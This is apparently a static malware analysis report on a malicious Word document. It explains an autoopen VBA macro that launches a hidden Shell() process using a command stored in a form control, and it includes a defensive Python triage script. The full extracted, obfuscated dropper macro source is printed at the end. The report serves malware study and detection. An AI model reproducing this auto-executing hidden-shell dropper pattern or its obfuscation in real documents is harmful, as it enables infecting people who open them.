Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e146e3d2c4d55630…

MALICIOUS

Office (OLE)

Size: 88.2 KB
Created: 2018-12-26 12:29:00
Authoring application: Microsoft Office Word
First seen: 2019-01-25
MD5: b197af97b4f6ca0a7138b60c2dd3e012
SHA-1: 9f7f08c2bce39567d8bda99b3e592deeb2691aed
SHA-256: e146e3d2c4d556306de859b24a5c0443dcbc55befcfef7d8669efa0583c5ee4d
182 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word document (OLE compound file) whose VBA project defines an autoopen procedure in the ThisDocument module, so the macro runs as soon as the document is opened with macros enabled (the critical OLE_VBA_SHELL and the high OLE_VBA_AUTOOPEN heuristics both fire on it). autoopen does nothing but evaluate throw-away arithmetic and call b16190, which in turn wraps a single Interaction.Shell() call in For Each loops over undeclared variables; those loops are padding that raises run-time errors swallowed by On Error Resume Next. The command passed to Shell() is not present in the VBA source: it is concatenated from undeclared (empty) variables and the value of the TextBox1 control on ThisDocument (Z9826672168.TextBox1), so the actual command text is stored in the form control's data rather than in the macro text. The window-style argument is written as 94 - 94, which evaluates to 0 (vbHide), so the spawned process runs with no visible window. An auto-executing macro that shells out with a hidden window is the classic macro dropper pattern, and downloading and running a secondary payload is the likely purpose, but the command line, and therefore any payload URL, cannot be confirmed from the extracted macro alone because it lives in the control, not in the source.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA source calls Shell(), i.e. the macro launches an external process.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the XML namespace identifier of Office's DrawingML markup, not a download location, so it is not a network indicator for this sample.
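To make the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings concrete, the following Python script is an added example, not part of this report and not oletools code: given VBA source as olevba emits it, it finds auto-executing procedures, follows their call graph until it reaches a Shell() call, folds arithmetic such as 94 - 94 to recover the window style, and flags when the command text is read from a form control instead of a string literal. The sample input is a trimmed excerpt of the macro shown under Extracted artifacts below; the list of auto-exec procedure names and the window-style table are the example author's own, and the generalisation to nested calls and to string-literal commands goes beyond this specific sample.

```python
"""Triage olevba-style VBA source for the auto-exec -> Shell() dropper pattern."""
import ast
import re

# Procedures Word/Excel run without user interaction (author's list, not exhaustive).
AUTO_EXEC = {"autoopen", "autoexec", "autonew", "autoclose", "autoexit", "auto_open",
             "auto_close", "document_open", "document_new", "document_close",
             "workbook_open", "workbook_close"}
# Window-style constants accepted by VBA's Shell(pathname, windowstyle).
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
PROC_RE = re.compile(r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(.*?\n"
                     r"(.*?)^[ \t]*End\s+(?:Sub|Function)", re.I | re.M | re.S)
CONTROL_RE = re.compile(r'^Attribute VB_Control = "(\w+),', re.M)
SHELL_RE = re.compile(r"\b(?:Interaction\.)?Shell\s*\(", re.I)

# Constructed input: trimmed excerpt of the macro extracted from this sample
# (the ThisDocument module and the function that autoopen calls).
SAMPLE = r'''Attribute VB_Name = "Z9826672168"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X4430 = 262 - 102
b16190
A330 = 730 - 826
End Sub

Attribute VB_Name = "j891537430"
Function b16190()
On Error Resume Next
J84519653 = Array(E21751797, r5246840, i223206, Interaction.Shell(("" + i226281 + F85929797 + Z9826672168.TextBox1) + u9535334 + r45727709 + b933981, 94 - 94), f331254, d45212059, W0556427)
End Function
'''


def fold_int(expr):
    # Evaluate a pure-arithmetic VBA expression such as "94 - 94"; None for anything else.
    if not re.fullmatch(r"[\d\s+\-*/()]+", expr):
        return None
    ops = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
           ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}

    def ev(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, int):
            return n.value
        if isinstance(n, ast.UnaryOp) and isinstance(n.op, ast.USub):
            return -ev(n.operand)
        if isinstance(n, ast.BinOp) and type(n.op) in ops:
            return ops[type(n.op)](ev(n.left), ev(n.right))
        raise ValueError("not pure arithmetic")
    try:
        return ev(ast.parse(expr.strip(), mode="eval").body)
    except (ValueError, SyntaxError, ZeroDivisionError):
        return None


def call_args(src, open_idx):
    # Split the argument list of the call whose "(" is at open_idx on top-level commas.
    depth, in_str, args, cur = 0, False, [], []
    for ch in src[open_idx:]:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
                if depth == 1:
                    continue
            elif ch == ")":
                depth -= 1
                if depth == 0:
                    return args + ["".join(cur).strip()]
            elif ch == "," and depth == 1:
                args.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    raise ValueError("unbalanced parentheses")


def find_shell_calls(body, controls):
    # Each Shell(...) in a procedure body: window style folded from its arithmetic
    # (omitted windowstyle defaults to vbMinimizedFocus) and any form control it reads.
    calls = []
    for m in SHELL_RE.finditer(body):
        args = call_args(body, m.end() - 1)
        style = fold_int(args[1]) if len(args) > 1 else 2
        calls.append({"command_expr": args[0], "window_style": style,
                      "window_style_name": WINDOW_STYLES.get(style, "unresolved"),
                      "hidden": style == 0,
                      "command_from_control": [c for c in controls
                                               if re.search(r"\." + c + r"\b", args[0])],
                      "string_literals": [s for s in re.findall(r'"([^"]*)"', args[0]) if s]})
    return calls


def reachable_from_auto_exec(procs):
    # Walk the call graph from auto-exec procedures; a callee is any known procedure
    # whose name occurs as a word in the caller's body.
    seen = {p for p in procs if p in AUTO_EXEC}
    queue = list(seen)
    while queue:
        body = procs[queue.pop()]
        for q in procs:
            if q not in seen and re.search(r"\b%s\b" % re.escape(q), body, re.I):
                seen.add(q)
                queue.append(q)
    return seen


def triage(src):
    procs = {n.lower(): b for n, b in PROC_RE.findall(src)}
    controls = CONTROL_RE.findall(src)
    reach = reachable_from_auto_exec(procs)
    shells = [dict(call, procedure=p) for p in sorted(reach)
              for call in find_shell_calls(procs[p], controls)]
    return {"auto_exec": sorted(p for p in procs if p in AUTO_EXEC),
            "reachable": sorted(reach), "form_controls": controls, "shell_calls": shells,
            "verdict": "auto-exec reaches Shell()" if shells else "no Shell() reachable from auto-exec"}
```

Running triage(SAMPLE) reports autoopen as the entry point, b16190 as reachable from it, one Shell() call with window style 0 (vbHide), no string literal in the command expression and TextBox1 as the control the command is read from; that last field is the cue to go and pull the control's stored value from the OLE file, since nothing in the macro text will reveal the command.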

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3765 bytes
SHA-256: b1bc50d7f3a8e7c509fc11a741d3782a8d9ae79f52065b691ded4b9bf0b2ff42
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Z9826672168"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X4430 = 262 - 102
j543 = 935 - 66
z941 = 614 - 194
b16190
o9483 = 804 - 461
Q438 = 963 - 530
A330 = 730 - 826
End Sub

Attribute VB_Name = "j891537430"
Function b16190()
On Error Resume Next
   For Each q1466 In F059
      K661 = Round(H4767 / CSng(o088))
      If O2840 Or w5385 Then
         r9600 = Sin(f2351)
      End If
      s390 = CSng(N4986 * CBool(o8647))
      If G9986 > l2281 Then
         h482 = Oct(Z780 - z4623 / 973 - Round(752 + Sin(Y606)))
      End If
   Next
J84519653 = Array(E21751797, r5246840, i223206, Interaction.Shell(("" + i226281 + F85929797 + Z9826672168.TextBox1) + u9535334 + r45727709 + b933981, 94 - 94), f331254, d45212059, W0556427)
   For Each n472 In Q1263
      c340 = Round(G949 / CSng(P943))
      If z695 Or C699 Then
         l1799 = Sin(N3502)
      End If
      j507 = CSng(k656 * CBool(v646))
      If D031 > Y452 Then
         Z061 = Oct(v3080 - d899 / 224 - Round(444 + Sin(W216)))
      End If
   Next
   For Each n7594 In h4007
      v2051 = Round(t236 / CSng(U9957))
      If W4911 Or C602 Then
         I232 = Sin(u5835)
      End If
      l6053 = CSng(B1661 * CBool(c7859))
      If z0118 > I3760 Then
         i446 = Oct(N2722 - w7726 / 664 - Round(517 + Sin(U714)))
      End If
   Next
End Function


Attribute VB_Name = "Q30883096"

Attribute VB_Name = "z504777785342"

Attribute VB_Name = "M0010709"

Attribute VB_Name = "Q307582223121"

Attribute VB_Name = "w7981085811"

Attribute VB_Name = "l1177845704"

Attribute VB_Name = "G1011057"

Attribute VB_Name = "F2868275"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Y235542137601"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z802497006618"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T9947086763"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "R6220835746982"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w45484728297236"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False